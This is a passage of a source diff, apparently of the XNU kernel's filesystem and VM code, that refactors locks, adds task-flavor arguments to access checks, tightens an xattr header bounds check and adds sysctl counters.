+ if (KERNEL_MOUNT_DEVFS & internal_flags) { + // kernel mounted devfs + mp->mnt_kern_flag |= MNTK_SYSTEM; + } + update: /* @@ -2198,10 +2206,10 @@ checkdirs(vnode_t olddp, vfs_context_t ctx) if (rootvnode == olddp) { vnode_ref(newdp); - lck_rw_lock_exclusive(rootvnode_rw_lock); + lck_rw_lock_exclusive(&rootvnode_rw_lock); tvp = rootvnode; rootvnode = newdp; - lck_rw_unlock_exclusive(rootvnode_rw_lock); + lck_rw_unlock_exclusive(&rootvnode_rw_lock); vnode_rele(tvp); } @@ -2317,6 +2325,10 @@ safedounmount(struct mount *mp, int flags, vfs_context_t ctx) * associated with it (for example, the associated VM or DATA mounts) . */ if ((mp->mnt_flag & MNT_ROOTFS) || (mp->mnt_kern_flag & MNTK_SYSTEM)) { + if (!(mp->mnt_flag & MNT_ROOTFS)) { + printf("attempt to unmount a system mount (%s), will return EBUSY\n", + mp->mnt_vfsstat.f_mntonname); + } error = EBUSY; /* the root (or associated volumes) is always busy */ goto out; } @@ -2833,17 +2845,17 @@ sync_thread(__unused void *arg, __unused wait_result_t wr) pm_sync_thread = current_thread(); #endif /* CONFIG_PHYS_WRITE_ACCT */ - lck_mtx_lock(sync_mtx_lck); + lck_mtx_lock(&sync_mtx_lck); while (sync_thread_state & SYNC_THREAD_RUN) { sync_thread_state &= ~SYNC_THREAD_RUN; - lck_mtx_unlock(sync_mtx_lck); + lck_mtx_unlock(&sync_mtx_lck); sync_type = SYNC_ONLY_RELIABLE_MEDIA; vfs_iterate(LK_NOWAIT, sync_internal_callback, &sync_type); sync_type = SYNC_ONLY_UNRELIABLE_MEDIA; vfs_iterate(LK_NOWAIT, sync_internal_callback, &sync_type); - lck_mtx_lock(sync_mtx_lck); + lck_mtx_lock(&sync_mtx_lck); } /* * This wakeup _has_ to be issued before the lock is released otherwise @@ -2856,7 +2868,7 @@ sync_thread(__unused void *arg, __unused wait_result_t wr) #if CONFIG_PHYS_WRITE_ACCT pm_sync_thread = NULL; #endif /* CONFIG_PHYS_WRITE_ACCT */ - lck_mtx_unlock(sync_mtx_lck); + lck_mtx_unlock(&sync_mtx_lck); if (print_vmpage_stat) { vm_countdirtypages(); @@ -2883,7 +2895,7 @@ sync_internal(void) int thread_created = FALSE; struct timespec ts 
= {.tv_sec = sync_timeout_seconds, .tv_nsec = 0}; - lck_mtx_lock(sync_mtx_lck); + lck_mtx_lock(&sync_mtx_lck); sync_thread_state |= SYNC_THREAD_RUN; if (!(sync_thread_state & SYNC_THREAD_RUNNING)) { int kr; @@ -2892,14 +2904,14 @@ sync_internal(void) kr = kernel_thread_start(sync_thread, NULL, &thd); if (kr != KERN_SUCCESS) { sync_thread_state &= ~SYNC_THREAD_RUNNING; - lck_mtx_unlock(sync_mtx_lck); + lck_mtx_unlock(&sync_mtx_lck); printf("sync_thread failed\n"); return 0; } thread_created = TRUE; } - error = msleep((caddr_t)&sync_thread_state, sync_mtx_lck, + error = msleep((caddr_t)&sync_thread_state, &sync_mtx_lck, (PVFS | PDROP | PCATCH), "sync_thread", &ts); if (error) { struct timeval now; @@ -4119,7 +4131,7 @@ fg_vn_data_alloc(void) /* Allocate per fd vnode data */ fvdata = kheap_alloc(KM_FD_VN_DATA, sizeof(struct fd_vn_data), Z_WAITOK | Z_ZERO); - lck_mtx_init(&fvdata->fv_lock, fd_vn_lck_grp, fd_vn_lck_attr); + lck_mtx_init(&fvdata->fv_lock, &fd_vn_lck_grp, &fd_vn_lck_attr); return fvdata; } @@ -4132,7 +4144,7 @@ fg_vn_data_free(void *fgvndata) struct fd_vn_data *fvdata = (struct fd_vn_data *)fgvndata; kheap_free(KHEAP_DATA_BUFFERS, fvdata->fv_buf, fvdata->fv_bufallocsiz); - lck_mtx_destroy(&fvdata->fv_lock, fd_vn_lck_grp); + lck_mtx_destroy(&fvdata->fv_lock, &fd_vn_lck_grp); kheap_free(KM_FD_VN_DATA, fvdata, sizeof(struct fd_vn_data)); } @@ -7990,14 +8002,14 @@ clonefile_internal(vnode_t fvp, boolean_t data_read_authorised, int dst_dirfd, /* * certain attributes may need to be changed from the source, we ask for - * those here. + * those here with the exception of source file's ACL. The clone file + * will inherit the target directory's ACL. 
*/ VATTR_INIT(&va); VATTR_WANTED(&va, va_uid); VATTR_WANTED(&va, va_gid); VATTR_WANTED(&va, va_mode); VATTR_WANTED(&va, va_flags); - VATTR_WANTED(&va, va_acl); if ((error = vnode_getattr(fvp, &va, ctx)) != 0) { goto out; @@ -8061,7 +8073,7 @@ clonefile_internal(vnode_t fvp, boolean_t data_read_authorised, int dst_dirfd, * If some of the requested attributes weren't handled by the * VNOP, use our fallback code. */ - if (!VATTR_ALL_SUPPORTED(&va)) { + if (!VATTR_ALL_SUPPORTED(&nva)) { (void)vnode_setattr_fallback(tvp, &nva, ctx); } @@ -10577,8 +10589,9 @@ static LIST_HEAD(nspace_resolver_requesthead, static u_long nspace_resolver_request_hashmask; static u_int nspace_resolver_request_count; static bool nspace_resolver_request_wait_slot; -static lck_grp_t *nspace_resolver_request_lck_grp; -static lck_mtx_t nspace_resolver_request_hash_mutex; +static LCK_GRP_DECLARE(nspace_resolver_request_lck_grp, "file namespace resolver"); +static LCK_MTX_DECLARE(nspace_resolver_request_hash_mutex, + &nspace_resolver_request_lck_grp); #define NSPACE_REQ_LOCK() \ lck_mtx_lock(&nspace_resolver_request_hash_mutex) @@ -10886,60 +10899,6 @@ nspace_materialization_set_thread_state(int is_prevented) return 0; } -static int -nspace_materialization_is_prevented(void) -{ - proc_t p = current_proc(); - uthread_t ut = (uthread_t)get_bsdthread_info(current_thread()); - vfs_context_t ctx = vfs_context_current(); - - /* - * Kernel context ==> return EDEADLK, as we would with any random - * process decorated as no-materialize. - */ - if (ctx == vfs_context_kernel()) { - return EDEADLK; - } - - /* - * If the process has the dataless-manipulation entitlement, - * materialization is prevented, and depending on the kind - * of file system operation, things get to proceed as if the - * object is not dataless. - */ - if (vfs_context_is_dataless_manipulator(ctx)) { - return EJUSTRETURN; - } - - /* - * Per-thread decorations override any process-wide decorations. 
- * (Foundation uses this, and this overrides even the dataless- - * manipulation entitlement so as to make API contracts consistent.) - */ - if (ut != NULL) { - if (ut->uu_flag & UT_NSPACE_NODATALESSFAULTS) { - return EDEADLK; - } - if (ut->uu_flag & UT_NSPACE_FORCEDATALESSFAULTS) { - return 0; - } - } - - /* - * If the process's iopolicy specifies that dataless files - * can be materialized, then we let it go ahead. - */ - if (p->p_vfs_iopolicy & P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES) { - return 0; - } - - /* - * The default behavior is to not materialize dataless files; - * return to the caller that deadlock was detected. - */ - return EDEADLK; -} - /* the vfs.nspace branch */ SYSCTL_NODE(_vfs, OID_AUTO, nspace, CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "vfs nspace hinge"); @@ -11078,16 +11037,67 @@ SYSCTL_PROC(_vfs_nspace, OID_AUTO, complete, #define __no_dataless_unused __unused #endif -void -nspace_resolver_init(void) +int +vfs_context_dataless_materialization_is_prevented( + vfs_context_t const ctx __no_dataless_unused) { #if CONFIG_DATALESS_FILES - nspace_resolver_request_lck_grp = - lck_grp_alloc_init("file namespace resolver", NULL); + proc_t const p = vfs_context_proc(ctx); + thread_t const t = vfs_context_thread(ctx); + uthread_t const ut = t ? get_bsdthread_info(t) : NULL; + + /* + * Kernel context ==> return EDEADLK, as we would with any random + * process decorated as no-materialize. + */ + if (ctx == vfs_context_kernel()) { + return EDEADLK; + } + + /* + * If the process has the dataless-manipulation entitlement, + * materialization is prevented, and depending on the kind + * of file system operation, things get to proceed as if the + * object is not dataless. + */ + if (vfs_context_is_dataless_manipulator(ctx)) { + return EJUSTRETURN; + } + + /* + * Per-thread decorations override any process-wide decorations. + * (Foundation uses this, and this overrides even the dataless- + * manipulation entitlement so as to make API contracts consistent.) 
+ */ + if (ut != NULL) { + if (ut->uu_flag & UT_NSPACE_NODATALESSFAULTS) { + return EDEADLK; + } + if (ut->uu_flag & UT_NSPACE_FORCEDATALESSFAULTS) { + return 0; + } + } - lck_mtx_init(&nspace_resolver_request_hash_mutex, - nspace_resolver_request_lck_grp, NULL); + /* + * If the process's iopolicy specifies that dataless files + * can be materialized, then we let it go ahead. + */ + if (p->p_vfs_iopolicy & P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES) { + return 0; + } +#endif /* CONFIG_DATALESS_FILES */ + /* + * The default behavior is to not materialize dataless files; + * return to the caller that deadlock was detected. + */ + return EDEADLK; +} + +void +nspace_resolver_init(void) +{ +#if CONFIG_DATALESS_FILES nspace_resolver_request_hashtbl = hashinit(NSPACE_RESOLVER_REQ_HASHSIZE, M_VNODE /* XXX */, &nspace_resolver_request_hashmask); @@ -11186,7 +11196,8 @@ resolve_nspace_item_ext( return ENOTSUP; } - error = nspace_materialization_is_prevented(); + error = vfs_context_dataless_materialization_is_prevented( + vfs_context_current()); if (error) { os_log_debug(OS_LOG_DEFAULT, "NSPACE process/thread is decorated as no-materialization"); diff --git a/bsd/vfs/vfs_xattr.c b/bsd/vfs/vfs_xattr.c index 0dfcf949f..8db2c859f 100644 --- a/bsd/vfs/vfs_xattr.c +++ b/bsd/vfs/vfs_xattr.c @@ -3207,6 +3207,7 @@ check_and_swap_attrhdr(attr_header_t *ah, attr_info_t *ainfop) */ end = ah->data_start + ah->data_length; if (ah->total_size > ainfop->finderinfo->offset + ainfop->finderinfo->length || + ah->data_start < sizeof(attr_header_t) || end < ah->data_start || end > ah->total_size) { return EINVAL; diff --git a/bsd/vm/vm_unix.c b/bsd/vm/vm_unix.c index 9421ee0f9..67aceb8d1 100644 --- a/bsd/vm/vm_unix.c +++ b/bsd/vm/vm_unix.c @@ -230,6 +230,13 @@ extern int cs_executable_wire; SYSCTL_INT(_vm, OID_AUTO, cs_executable_create_upl, CTLFLAG_RD | CTLFLAG_LOCKED, &cs_executable_create_upl, 0, ""); SYSCTL_INT(_vm, OID_AUTO, cs_executable_wire, CTLFLAG_RD | CTLFLAG_LOCKED, 
&cs_executable_wire, 0, ""); +extern int apple_protect_pager_count; +extern int apple_protect_pager_count_mapped; +extern unsigned int apple_protect_pager_cache_limit; +SYSCTL_INT(_vm, OID_AUTO, apple_protect_pager_count, CTLFLAG_RD | CTLFLAG_LOCKED, &apple_protect_pager_count, 0, ""); +SYSCTL_INT(_vm, OID_AUTO, apple_protect_pager_count_mapped, CTLFLAG_RD | CTLFLAG_LOCKED, &apple_protect_pager_count_mapped, 0, ""); +SYSCTL_UINT(_vm, OID_AUTO, apple_protect_pager_cache_limit, CTLFLAG_RW | CTLFLAG_LOCKED, &apple_protect_pager_cache_limit, 0, ""); + #if DEVELOPMENT || DEBUG extern int radar_20146450; SYSCTL_INT(_vm, OID_AUTO, radar_20146450, CTLFLAG_RW | CTLFLAG_LOCKED, &radar_20146450, 0, ""); @@ -316,7 +323,7 @@ SYSCTL_INT(_vm, OID_AUTO, vm_shadow_max_enabled, CTLFLAG_RW | CTLFLAG_LOCKED, &v SYSCTL_INT(_vm, OID_AUTO, vm_debug_events, CTLFLAG_RW | CTLFLAG_LOCKED, &vm_debug_events, 0, ""); __attribute__((noinline)) int __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__( - mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid); + mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid, mach_task_flavor_t flavor); /* * Sysctl's related to data/stack execution. 
See osfmk/vm/vm_map.c */ @@ -844,9 +851,9 @@ out: */ __attribute__((noinline)) int __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__( - mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid) + mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid, mach_task_flavor_t flavor) { - return check_task_access(task_access_port, calling_pid, calling_gid, target_pid); + return check_task_access_with_flavor(task_access_port, calling_pid, calling_gid, target_pid, flavor); } /* @@ -885,14 +892,14 @@ task_for_pid( /* Always check if pid == 0 */ if (pid == 0) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE); return KERN_FAILURE; } t1 = port_name_to_task(target_tport); if (t1 == TASK_NULL) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE); return KERN_FAILURE; } @@ -931,7 +938,7 @@ task_for_pid( p = PROC_NULL; #if CONFIG_MACF - error = mac_proc_check_get_task(kauth_cred_get(), &pident); + error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_CONTROL); if (error) { error = KERN_FAILURE; goto tfpout; @@ -949,7 +956,8 @@ task_for_pid( } /* Call up to the task access server */ - error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid); + error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, + proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL); if (error != MACH_MSG_SUCCESS) { if (error == MACH_RCV_INTERRUPTED) { @@ -963,7 +971,13 @@ task_for_pid( /* Grant task port access */ extmod_statistics_incr_task_for_pid(task); - sright = (void *) convert_task_to_port(task); + + if (task == current_task()) { + /* return pinned self if current_task() so equality check with 
mach_task_self_ passes */ + sright = (void *)convert_task_to_port_pinned(task); + } else { + sright = (void *)convert_task_to_port(task); + } /* Check if the task has been corpsified */ if (is_corpsetask(task)) { @@ -1019,9 +1033,9 @@ task_name_for_pid( mach_port_name_t target_tport = args->target_tport; int pid = args->pid; user_addr_t task_addr = args->t; - proc_t p = PROC_NULL; - task_t t1; - mach_port_name_t tret; + proc_t p = PROC_NULL; + task_t t1 = TASK_NULL; + mach_port_name_t tret = MACH_PORT_NULL; void * sright; int error = 0, refheld = 0; kauth_cred_t target_cred; @@ -1032,7 +1046,7 @@ task_name_for_pid( t1 = port_name_to_task(target_tport); if (t1 == TASK_NULL) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE); return KERN_FAILURE; } @@ -1057,7 +1071,7 @@ task_name_for_pid( proc_rele(p); p = PROC_NULL; #if CONFIG_MACF - error = mac_proc_check_get_task_name(kauth_cred_get(), &pident); + error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_NAME); if (error) { task_deallocate(task); goto noperm; @@ -1122,13 +1136,13 @@ task_inspect_for_pid(struct proc *p __unused, struct task_inspect_for_pid_args * /* Disallow inspect port for kernel_task */ if (pid == 0) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); return EPERM; } t1 = port_name_to_task(target_tport); if (t1 == TASK_NULL) { - (void) copyout((char *) &t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *) &tret, task_addr, sizeof(mach_port_name_t)); return EINVAL; } @@ -1158,12 +1172,8 @@ task_inspect_for_pid(struct proc *p __unused, struct task_inspect_for_pid_args * proc_rele(proc); proc = PROC_NULL; - /* - * For now, it performs the same set of permission checks as task_for_pid. 
This - * will be addressed in rdar://problem/53478660 - */ #if CONFIG_MACF - error = mac_proc_check_get_task(kauth_cred_get(), &pident); + error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_INSPECT); if (error) { error = EPERM; goto tifpout; @@ -1182,7 +1192,8 @@ task_inspect_for_pid(struct proc *p __unused, struct task_inspect_for_pid_args * /* Call up to the task access server */ - error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid); + error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, + proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_INSPECT); if (error != MACH_MSG_SUCCESS) { if (error == MACH_RCV_INTERRUPTED) { @@ -1247,13 +1258,13 @@ task_read_for_pid(struct proc *p __unused, struct task_read_for_pid_args *args, /* Disallow read port for kernel_task */ if (pid == 0) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); return EPERM; } t1 = port_name_to_task(target_tport); if (t1 == TASK_NULL) { - (void) copyout((char *) &t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); return EINVAL; } @@ -1283,12 +1294,8 @@ task_read_for_pid(struct proc *p __unused, struct task_read_for_pid_args *args, proc_rele(proc); proc = PROC_NULL; - /* - * For now, it performs the same set of permission checks as task_for_pid. 
This - * will be addressed in rdar://problem/53478660 - */ #if CONFIG_MACF - error = mac_proc_check_get_task(kauth_cred_get(), &pident); + error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_READ); if (error) { error = EPERM; goto trfpout; @@ -1307,7 +1314,8 @@ task_read_for_pid(struct proc *p __unused, struct task_read_for_pid_args *args, /* Call up to the task access server */ - error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid); + error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, + proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_READ); if (error != MACH_MSG_SUCCESS) { if (error == MACH_RCV_INTERRUPTED) { @@ -1382,7 +1390,7 @@ pid_suspend(struct proc *p __unused, struct pid_suspend_args *args, int *ret) #endif target = targetproc->task; -#ifndef CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (target != TASK_NULL) { /* If we aren't root and target's task access port is set... */ if (!kauth_cred_issuser(kauth_cred_get()) && @@ -1395,7 +1403,8 @@ pid_suspend(struct proc *p __unused, struct pid_suspend_args *args, int *ret) } /* Call up to the task access server */ - error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid); + error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, + proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL); if (error != MACH_MSG_SUCCESS) { if (error == MACH_RCV_INTERRUPTED) { @@ -1407,7 +1416,7 @@ pid_suspend(struct proc *p __unused, struct pid_suspend_args *args, int *ret) } } } -#endif +#endif /* XNU_TARGET_OS_OSX */ task_reference(target); error = task_pidsuspend(target); @@ -1460,14 +1469,14 @@ debug_control_port_for_pid(struct debug_control_port_for_pid_args *args) /* Always check if pid == 0 */ if (pid == 0) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); 
AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE); return KERN_FAILURE; } t1 = port_name_to_task(target_tport); if (t1 == TASK_NULL) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE); return KERN_FAILURE; } @@ -1505,7 +1514,7 @@ debug_control_port_for_pid(struct debug_control_port_for_pid_args *args) if (!IOTaskHasEntitlement(current_task(), DEBUG_PORT_ENTITLEMENT)) { #if CONFIG_MACF - error = mac_proc_check_get_task(kauth_cred_get(), &pident); + error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_CONTROL); if (error) { error = KERN_FAILURE; goto tfpout; @@ -1524,7 +1533,8 @@ debug_control_port_for_pid(struct debug_control_port_for_pid_args *args) /* Call up to the task access server */ - error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid); + error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, + proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL); if (error != MACH_MSG_SUCCESS) { if (error == MACH_RCV_INTERRUPTED) { @@ -1607,7 +1617,7 @@ pid_resume(struct proc *p __unused, struct pid_resume_args *args, int *ret) #endif target = targetproc->task; -#ifndef CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (target != TASK_NULL) { /* If we aren't root and target's task access port is set... 
*/ if (!kauth_cred_issuser(kauth_cred_get()) && @@ -1620,7 +1630,8 @@ pid_resume(struct proc *p __unused, struct pid_resume_args *args, int *ret) } /* Call up to the task access server */ - error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid); + error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, + proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL); if (error != MACH_MSG_SUCCESS) { if (error == MACH_RCV_INTERRUPTED) { @@ -1632,7 +1643,7 @@ pid_resume(struct proc *p __unused, struct pid_resume_args *args, int *ret) } } } -#endif +#endif /* XNU_TARGET_OS_OSX */ #if !XNU_TARGET_OS_OSX #if SOCKETS @@ -1675,7 +1686,7 @@ out: return error; } -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX /* * Freeze the specified process (provided in args->pid), or find and freeze a PID. * When a process is specified, this call is blocking, otherwise we wake up the @@ -1737,7 +1748,7 @@ out: *ret = error; return error; } -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ #if SOCKETS int @@ -1750,7 +1761,7 @@ networking_memstatus_callout(proc_t p, uint32_t status) * proc lock NOT held * a reference on the proc has been held / shall be dropped by the caller. */ - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); LCK_MTX_ASSERT(&p->p_mlock, LCK_MTX_ASSERT_NOTOWNED); proc_fdlock(p); @@ -1946,6 +1957,7 @@ shared_region_check_np( mach_vm_offset_t start_address = 0; int error = 0; kern_return_t kr; + task_t task = current_task(); SHARED_REGION_TRACE_DEBUG( ("shared_region: %p [%d(%s)] -> check_np(0x%llx)\n", @@ -1954,10 +1966,10 @@ shared_region_check_np( (uint64_t)uap->start_address)); /* retrieve the current tasks's shared region */ - shared_region = vm_shared_region_get(current_task()); + shared_region = vm_shared_region_get(task); if (shared_region != NULL) { /* retrieve address of its first mapping... 
*/ - kr = vm_shared_region_start_address(shared_region, &start_address); + kr = vm_shared_region_start_address(shared_region, &start_address, task); if (kr != KERN_SUCCESS) { error = ENOMEM; } else { @@ -2714,7 +2726,11 @@ done: * a max value. The kernel will choose a random value based on that, then use it * for all shared regions. */ -#define SLIDE_AMOUNT_MASK ~PAGE_MASK +#if defined (__x86_64__) +#define SLIDE_AMOUNT_MASK ~FOURK_PAGE_MASK +#else +#define SLIDE_AMOUNT_MASK ~SIXTEENK_PAGE_MASK +#endif int shared_region_map_and_slide_2_np( @@ -2827,7 +2843,7 @@ shared_region_map_and_slide_2_np( } mappings[m].sms_address += slide_amount; if (mappings[m].sms_slide_size != 0) { - mappings[i].sms_slide_start += slide_amount; + mappings[m].sms_slide_start += slide_amount; } } } @@ -2894,19 +2910,8 @@ static int vm_mixed_pagesize_supported = 0; SYSCTL_INT(_debug, OID_AUTO, vm_mixed_pagesize_supported, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &vm_mixed_pagesize_supported, 0, "kernel support for mixed pagesize"); - -extern uint64_t get_pages_grabbed_count(void); - -static int -pages_grabbed SYSCTL_HANDLER_ARGS -{ -#pragma unused(arg1, arg2, oidp) - uint64_t value = get_pages_grabbed_count(); - return SYSCTL_OUT(req, &value, sizeof(value)); -} - -SYSCTL_PROC(_vm, OID_AUTO, pages_grabbed, CTLTYPE_QUAD | CTLFLAG_RD | CTLFLAG_LOCKED, - 0, 0, &pages_grabbed, "QU", "Total pages grabbed"); +SCALABLE_COUNTER_DECLARE(vm_page_grab_count); +SYSCTL_SCALABLE_COUNTER(_vm, pages_grabbed, vm_page_grab_count, "Total pages grabbed"); SYSCTL_ULONG(_vm, OID_AUTO, pages_freed, CTLFLAG_RD | CTLFLAG_LOCKED, &vm_pageout_vminfo.vm_page_pages_freed, "Total pages freed"); @@ -3344,6 +3349,47 @@ extern int pmap_ledgers_panic_leeway; SYSCTL_INT(_vm, OID_AUTO, pmap_ledgers_panic_leeway, CTLFLAG_RW | CTLFLAG_LOCKED, &pmap_ledgers_panic_leeway, 0, ""); #endif /* MACH_ASSERT */ + +extern uint64_t vm_map_lookup_locked_copy_slowly_count; +extern uint64_t vm_map_lookup_locked_copy_slowly_size; +extern 
uint64_t vm_map_lookup_locked_copy_slowly_max; +extern uint64_t vm_map_lookup_locked_copy_slowly_restart; +extern uint64_t vm_map_lookup_locked_copy_slowly_error; +extern uint64_t vm_map_lookup_locked_copy_strategically_count; +extern uint64_t vm_map_lookup_locked_copy_strategically_size; +extern uint64_t vm_map_lookup_locked_copy_strategically_max; +extern uint64_t vm_map_lookup_locked_copy_strategically_restart; +extern uint64_t vm_map_lookup_locked_copy_strategically_error; +extern uint64_t vm_map_lookup_locked_copy_shadow_count; +extern uint64_t vm_map_lookup_locked_copy_shadow_size; +extern uint64_t vm_map_lookup_locked_copy_shadow_max; +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_count, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_count, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_size, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_size, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_max, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_max, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_restart, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_restart, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_error, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_error, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_count, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_count, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_size, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_size, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_max, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_max, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_restart, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_restart, ""); +SYSCTL_QUAD(_vm, 
OID_AUTO, map_lookup_locked_copy_strategically_error, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_error, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_shadow_count, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_shadow_count, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_shadow_size, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_shadow_size, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_shadow_max, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_shadow_max, ""); + extern int vm_protect_privileged_from_untrusted; SYSCTL_INT(_vm, OID_AUTO, protect_privileged_from_untrusted, CTLFLAG_RW | CTLFLAG_LOCKED, &vm_protect_privileged_from_untrusted, 0, ""); @@ -3416,8 +3462,84 @@ SYSCTL_PROC(_vm, OID_AUTO, shared_region_pivot, CTLTYPE_INT | CTLFLAG_WR | CTLFLAG_LOCKED, 0, 0, shared_region_pivot, "I", ""); -extern int vm_remap_old_path, vm_remap_new_path; -SYSCTL_INT(_vm, OID_AUTO, remap_old_path, - CTLFLAG_RD | CTLFLAG_LOCKED, &vm_remap_old_path, 0, ""); -SYSCTL_INT(_vm, OID_AUTO, remap_new_path, - CTLFLAG_RD | CTLFLAG_LOCKED, &vm_remap_new_path, 0, ""); +/* + * sysctl to return the number of pages on retired_pages_object + */ +static int +retired_pages_count SYSCTL_HANDLER_ARGS +{ +#pragma unused(arg1, arg2, oidp) + extern uint32_t vm_retired_pages_count(void); + uint32_t value = vm_retired_pages_count(); + + return SYSCTL_OUT(req, &value, sizeof(value)); +} +SYSCTL_PROC(_vm, OID_AUTO, retired_pages_count, CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_LOCKED, + 0, 0, &retired_pages_count, "I", ""); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_total, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_total, 0, "total text page corruptions detected"); +SYSCTL_INT(_vm, OID_AUTO, vmtc_undiagnosed, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_undiagnosed, 0, "undiagnosed text page corruptions"); +SYSCTL_INT(_vm, OID_AUTO, 